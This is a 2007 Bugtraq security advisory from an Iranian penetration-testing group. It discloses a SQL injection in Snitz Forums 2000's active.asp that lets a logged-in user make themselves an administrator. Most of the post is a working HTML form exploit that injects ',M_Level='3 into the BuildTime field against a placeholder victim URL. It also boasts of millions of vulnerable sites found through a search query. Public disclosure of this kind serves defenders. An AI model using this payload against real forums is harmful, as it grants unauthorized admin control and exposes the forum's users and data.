[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071203222106.1252.qmail@securityfocus.com>
Date: 3 Dec 2007 22:21:06 -0000
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Subject: Snitz2000 SQL Injection: A user can gain admin level
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"
After login to your VICTIM forum, execute below script
~~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
~~~~~~~~~~~~End HTML Exploit~~~~~~~~~
#####################################################################
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact: admin@...report.ir
# Credit: Soroush Dalili found this bug.
#####################################################################
Powered by blists - more mailing lists